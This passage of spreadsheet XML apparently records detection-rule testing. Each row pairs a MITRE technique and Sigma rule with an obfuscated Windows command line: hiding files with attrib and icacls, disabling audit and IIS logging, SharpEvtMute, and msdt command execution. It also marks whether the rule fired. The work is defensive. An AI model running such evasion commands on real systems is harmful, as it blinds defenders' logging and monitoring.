          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E3768" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c attrib.exe +^s C:\Users\thaim\AppData\Local\Temp\T1564.001.exe</t>
        </is>
      </c>
      <c r="F3768" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3768" s="44" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE (efec536f-72e8-4656-8960-5e85d091345b)</t>
        </is>
      </c>
      <c r="J3768" s="44" t="n"/>
      <c r="K3768" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3769" ht="15.75" customHeight="1" s="42">
      <c r="A3769" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3769" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C3769" s="44" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D3769" s="44" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E3769" s="44" t="inlineStr">
        <is>
          <t>attrib.exe +s C:\Users\thaim\AppData\Local\.\Temp\T1564.001.exe</t>
        </is>
      </c>
      <c r="F3769" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3769" s="44" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE (efec536f-72e8-4656-8960-5e85d091345b)</t>
        </is>
      </c>
      <c r="J3769" s="44" t="n"/>
      <c r="K3769" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3770" ht="15.75" customHeight="1" s="42">
      <c r="A3770" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3770" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C3770" s="44" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D3770" s="44" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E3770" s="44" t="inlineStr">
        <is>
          <t>icacls.exe "C:\Users\Public\test.exe" /deny	*S-1-1-0:(OI)(CI)(DE,DC)</t>
        </is>
      </c>
      <c r="F3770" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3770" s="44" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone (4ae81040-fc1c-4249-bfa3-938d260214d9)</t>
        </is>
      </c>
      <c r="J3770" s="44" t="n"/>
      <c r="K3770" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3771" ht="15.75" customHeight="1" s="42">
      <c r="A3771" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3771" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C3771" s="44" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D3771" s="44" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E3771" s="44" t="inlineStr">
        <is>
          <t>icacls.exe "C:\Users\Public\test.exe" "/deny" "*S-1-1-0:(OI)(CI)(DE,DC)"</t>
        </is>
      </c>
      <c r="F3771" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3771" s="44" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone (4ae81040-fc1c-4249-bfa3-938d260214d9)</t>
        </is>
      </c>
      <c r="J3771" s="44" t="n"/>
      <c r="K3771" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3772" ht="15.75" customHeight="1" s="42">
      <c r="A3772" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3772" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C3772" s="44" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D3772" s="44" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E3772" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c icacls.exe /de^ny *S-1-1-0:(OI)(CI)(DE,DC)</t>
        </is>
      </c>
      <c r="F3772" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3772" s="44" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone (4ae81040-fc1c-4249-bfa3-938d260214d9)</t>
        </is>
      </c>
      <c r="J3772" s="44" t="n"/>
      <c r="K3772" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3773" ht="15.75" customHeight="1" s="42">
      <c r="A3773" s="44" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B3773" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_icacls_deny</t>
        </is>
      </c>
      <c r="C3773" s="44" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone</t>
        </is>
      </c>
      <c r="D3773" s="44" t="inlineStr">
        <is>
          <t>4ae81040-fc1c-4249-bfa3-938d260214d9</t>
        </is>
      </c>
      <c r="E3773" s="44" t="inlineStr">
        <is>
          <t>icacls.exe "C:\Users\Public\test.exe" /deny  *S-1-1-0:(OI)(CI)(DE,DC)</t>
        </is>
      </c>
      <c r="F3773" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3773" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3773" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3773" s="44" t="inlineStr">
        <is>
          <t>Use Icacls to Hide File to Everyone (4ae81040-fc1c-4249-bfa3-938d260214d9)</t>
        </is>
      </c>
      <c r="J3773" s="44" t="n"/>
      <c r="K3773" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3774" ht="15.75" customHeight="1" s="42">
      <c r="A3774" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3774" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_nt_resource_kit_usage</t>
        </is>
      </c>
      <c r="C3774" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol</t>
        </is>
      </c>
      <c r="D3774" s="44" t="inlineStr">
        <is>
          <t>c6c56ada-612b-42d1-9a29-adad3c5c2c1e</t>
        </is>
      </c>
      <c r="E3774" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c auditpol.exe /log^on:none</t>
        </is>
      </c>
      <c r="F3774" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3774" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3774" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3774" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol (c6c56ada-612b-42d1-9a29-adad3c5c2c1e)</t>
        </is>
      </c>
      <c r="J3774" s="44" t="n"/>
      <c r="K3774" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3775" ht="15.75" customHeight="1" s="42">
      <c r="A3775" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3775" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_nt_resource_kit_usage</t>
        </is>
      </c>
      <c r="C3775" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol</t>
        </is>
      </c>
      <c r="D3775" s="44" t="inlineStr">
        <is>
          <t>c6c56ada-612b-42d1-9a29-adad3c5c2c1e</t>
        </is>
      </c>
      <c r="E3775" s="44" t="inlineStr">
        <is>
          <t>auditpol.exe	/logon:none</t>
        </is>
      </c>
      <c r="F3775" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3775" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3775" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3775" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via NT Resource Kit Auditpol (c6c56ada-612b-42d1-9a29-adad3c5c2c1e); Audit Policy Tampering Via NT Resource Kit Auditpol (c6c56ada-612b-42d1-9a29-adad3c5c2c1e)</t>
        </is>
      </c>
      <c r="J3775" s="44" t="n"/>
      <c r="K3775" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3776" ht="15.75" customHeight="1" s="42">
      <c r="A3776" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3776" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C3776" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D3776" s="44" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E3776" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c auditpol.exe /set /subcategory:"Logon" /success:dis^able /failure:dis^able</t>
        </is>
      </c>
      <c r="F3776" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3776" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3776" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3776" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol (0a13e132-651d-11eb-ae93-0242ac130002)</t>
        </is>
      </c>
      <c r="J3776" s="44" t="n"/>
      <c r="K3776" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3777" ht="15.75" customHeight="1" s="42">
      <c r="A3777" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3777" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_auditpol_susp_execution</t>
        </is>
      </c>
      <c r="C3777" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol</t>
        </is>
      </c>
      <c r="D3777" s="44" t="inlineStr">
        <is>
          <t>0a13e132-651d-11eb-ae93-0242ac130002</t>
        </is>
      </c>
      <c r="E3777" s="44" t="inlineStr">
        <is>
          <t>auditpol.exe	/set	/subcategory:"Logon"	/success:disable	/failure:disable</t>
        </is>
      </c>
      <c r="F3777" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3777" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3777" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3777" s="44" t="inlineStr">
        <is>
          <t>Audit Policy Tampering Via Auditpol (0a13e132-651d-11eb-ae93-0242ac130002)</t>
        </is>
      </c>
      <c r="J3777" s="44" t="n"/>
      <c r="K3777" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3778" ht="15.75" customHeight="1" s="42">
      <c r="A3778" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3778" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpevtmute</t>
        </is>
      </c>
      <c r="C3778" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpEvtMute Execution</t>
        </is>
      </c>
      <c r="D3778" s="44" t="inlineStr">
        <is>
          <t>bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c</t>
        </is>
      </c>
      <c r="E3778" s="44" t="inlineStr">
        <is>
          <t>SharpEvtMute.exe --Filter	"rule test"</t>
        </is>
      </c>
      <c r="F3778" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3778" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3778" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3778" s="44" t="n"/>
      <c r="J3778" s="44" t="n"/>
      <c r="K3778" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3779" ht="15.75" customHeight="1" s="42">
      <c r="A3779" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3779" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpevtmute</t>
        </is>
      </c>
      <c r="C3779" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpEvtMute Execution</t>
        </is>
      </c>
      <c r="D3779" s="44" t="inlineStr">
        <is>
          <t>bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c</t>
        </is>
      </c>
      <c r="E3779" s="44" t="inlineStr">
        <is>
          <t>SharpEvtMute.exe "--Filter" "rule test"</t>
        </is>
      </c>
      <c r="F3779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3779" s="44" t="n"/>
      <c r="J3779" s="44" t="n"/>
      <c r="K3779" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3780" ht="15.75" customHeight="1" s="42">
      <c r="A3780" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3780" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpevtmute</t>
        </is>
      </c>
      <c r="C3780" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpEvtMute Execution</t>
        </is>
      </c>
      <c r="D3780" s="44" t="inlineStr">
        <is>
          <t>bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c</t>
        </is>
      </c>
      <c r="E3780" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c SharpEvtMute.exe --Fil^ter "rule test"</t>
        </is>
      </c>
      <c r="F3780" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3780" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3780" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3780" s="44" t="n"/>
      <c r="J3780" s="44" t="n"/>
      <c r="K3780" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3781" ht="15.75" customHeight="1" s="42">
      <c r="A3781" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3781" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpevtmute</t>
        </is>
      </c>
      <c r="C3781" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpEvtMute Execution</t>
        </is>
      </c>
      <c r="D3781" s="44" t="inlineStr">
        <is>
          <t>bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c</t>
        </is>
      </c>
      <c r="E3781" s="44" t="inlineStr">
        <is>
          <t>SharpEvtMute.exe --Filter   "rule test"</t>
        </is>
      </c>
      <c r="F3781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3781" s="44" t="n"/>
      <c r="J3781" s="44" t="n"/>
      <c r="K3781" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3782" ht="15.75" customHeight="1" s="42">
      <c r="A3782" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3782" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpevtmute</t>
        </is>
      </c>
      <c r="C3782" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpEvtMute Execution</t>
        </is>
      </c>
      <c r="D3782" s="44" t="inlineStr">
        <is>
          <t>bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c</t>
        </is>
      </c>
      <c r="E3782" s="44" t="inlineStr">
        <is>
          <t>SharpEvtMute.exe --Filter "rule	 test"</t>
        </is>
      </c>
      <c r="F3782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3782" s="44" t="n"/>
      <c r="J3782" s="44" t="n"/>
      <c r="K3782" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3783" ht="15.75" customHeight="1" s="42">
      <c r="A3783" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3783" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_http_logging</t>
        </is>
      </c>
      <c r="C3783" s="44" t="inlineStr">
        <is>
          <t>Disable Windows IIS HTTP Logging</t>
        </is>
      </c>
      <c r="D3783" s="44" t="inlineStr">
        <is>
          <t>e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e</t>
        </is>
      </c>
      <c r="E3783" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\inetsrv\appcmd.exe set config /section:httplogging /dontLog:true</t>
        </is>
      </c>
      <c r="F3783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3783" s="44" t="n"/>
      <c r="J3783" s="44" t="n"/>
      <c r="K3783" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3784" ht="15.75" customHeight="1" s="42">
      <c r="A3784" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3784" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_http_logging</t>
        </is>
      </c>
      <c r="C3784" s="44" t="inlineStr">
        <is>
          <t>Disable Windows IIS HTTP Logging</t>
        </is>
      </c>
      <c r="D3784" s="44" t="inlineStr">
        <is>
          <t>e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e</t>
        </is>
      </c>
      <c r="E3784" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\inetsrv\appcmd.exe set config "section:httplogging" "dontLog:true"</t>
        </is>
      </c>
      <c r="F3784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3784" s="44" t="n"/>
      <c r="J3784" s="44" t="n"/>
      <c r="K3784" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3785" ht="15.75" customHeight="1" s="42">
      <c r="A3785" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3785" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_http_logging</t>
        </is>
      </c>
      <c r="C3785" s="44" t="inlineStr">
        <is>
          <t>Disable Windows IIS HTTP Logging</t>
        </is>
      </c>
      <c r="D3785" s="44" t="inlineStr">
        <is>
          <t>e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e</t>
        </is>
      </c>
      <c r="E3785" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Windows\System32\inetsrv\appcmd.exe se^t con^fig sectio^n:httplogging dontL^og:true</t>
        </is>
      </c>
      <c r="F3785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3785" s="44" t="n"/>
      <c r="J3785" s="44" t="n"/>
      <c r="K3785" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3786" ht="15.75" customHeight="1" s="42">
      <c r="A3786" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3786" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_iis_appcmd_http_logging</t>
        </is>
      </c>
      <c r="C3786" s="44" t="inlineStr">
        <is>
          <t>Disable Windows IIS HTTP Logging</t>
        </is>
      </c>
      <c r="D3786" s="44" t="inlineStr">
        <is>
          <t>e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e</t>
        </is>
      </c>
      <c r="E3786" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\inetsrv\appcmd.exe  set  config  section:httplogging  dontLog:true</t>
        </is>
      </c>
      <c r="F3786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3786" s="44" t="n"/>
      <c r="J3786" s="44" t="n"/>
      <c r="K3786" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3787" ht="15.75" customHeight="1" s="42">
      <c r="A3787" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3787" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C3787" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D3787" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E3787" s="44" t="inlineStr">
        <is>
          <t>secedit.exe "/configure" "/db" mytemplate.db</t>
        </is>
      </c>
      <c r="F3787" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3787" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J3787" s="44" t="n"/>
      <c r="K3787" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3788" ht="15.75" customHeight="1" s="42">
      <c r="A3788" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3788" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C3788" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D3788" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E3788" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c secedit.exe /conf^igure /db mytemplate.db</t>
        </is>
      </c>
      <c r="F3788" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3788" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J3788" s="44" t="n"/>
      <c r="K3788" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3789" ht="15.75" customHeight="1" s="42">
      <c r="A3789" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B3789" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C3789" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D3789" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E3789" s="44" t="inlineStr">
        <is>
          <t>secedit.exe /EXPORT /AREAS SECURITYPOLICY /CFG output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F3789" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3789" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J3789" s="44" t="n"/>
      <c r="K3789" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3790" ht="15.75" customHeight="1" s="42">
      <c r="A3790" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3790" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3790" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Using Msdt.EXE</t>
        </is>
      </c>
      <c r="D3790" s="44" t="inlineStr">
        <is>
          <t>258fc8ce-8352-443a-9120-8a11e4857fa5</t>
        </is>
      </c>
      <c r="E3790" s="44" t="inlineStr">
        <is>
          <t>msdt.exe /id PCWDiagnostic /skip true /param "\"IT_BrowseForFile=\"echo TEST-HOST"</t>
        </is>
      </c>
      <c r="F3790" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3790" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Using Msdt.EXE (258fc8ce-8352-443a-9120-8a11e4857fa5)</t>
        </is>
      </c>
      <c r="J3790" s="44" t="n"/>
      <c r="K3790" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3791" ht="15.75" customHeight="1" s="42">
      <c r="A3791" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3791" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3791" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Using Msdt.EXE</t>
        </is>
      </c>
      <c r="D3791" s="44" t="inlineStr">
        <is>
          <t>258fc8ce-8352-443a-9120-8a11e4857fa5</t>
        </is>
      </c>
      <c r="E3791" s="44" t="inlineStr">
        <is>
          <t>msdt.exe /id PCWDiagnostic /skip true /param IT_BrowseForFile=echo	TEST-HOST</t>
        </is>
      </c>
      <c r="F3791" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3791" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Using Msdt.EXE (258fc8ce-8352-443a-9120-8a11e4857fa5)</t>
        </is>
      </c>
      <c r="J3791" s="44" t="n"/>
      <c r="K3791" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3792" ht="15.75" customHeight="1" s="42">
      <c r="A3792" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3792" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3792" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Using Msdt.EXE</t>
        </is>
      </c>
      <c r="D3792" s="44" t="inlineStr">
        <is>
          <t>258fc8ce-8352-443a-9120-8a11e4857fa5</t>
        </is>
      </c>
      <c r="E3792" s="44" t="inlineStr">
        <is>
          <t>msdt.exe /id PCWDiagnostic /skip true /param "it_browseforfile=echo TEST-HOST"</t>
        </is>
      </c>
      <c r="F3792" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3792" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Using Msdt.EXE (258fc8ce-8352-443a-9120-8a11e4857fa5)</t>
        </is>
      </c>
      <c r="J3792" s="44" t="n"/>
      <c r="K3792" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3793" ht="15.75" customHeight="1" s="42">
      <c r="A3793" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3793" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_susp_cab_options</t>
        </is>
      </c>
      <c r="C3793" s="44" t="inlineStr">
        <is>
          <t>Suspicious Cabinet File Execution Via Msdt.EXE</t>
        </is>
      </c>
      <c r="D3793" s="44" t="inlineStr">
        <is>
          <t>dc4576d4-7467-424f-9eee-fd2b02855fe0</t>
        </is>
      </c>
      <c r="E3793" s="44" t="inlineStr">
        <is>
          <t>msdt.exe /cab C:\Temp\test.cab</t>
        </is>
      </c>
      <c r="F3793" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3793" s="44" t="inlineStr">
        <is>
          <t>Suspicious Cabinet File Execution Via Msdt.EXE (dc4576d4-7467-424f-9eee-fd2b02855fe0)</t>
        </is>
      </c>
      <c r="J3793" s="44" t="n"/>
      <c r="K3793" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3794" ht="15.75" customHeight="1" s="42">
      <c r="A3794" s="44" t="inlineStr">
        <is>
          <t>t1202</t>
        </is>
      </c>
      <c r="B3794" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_susp_cab_options</t>
        </is>
      </c>
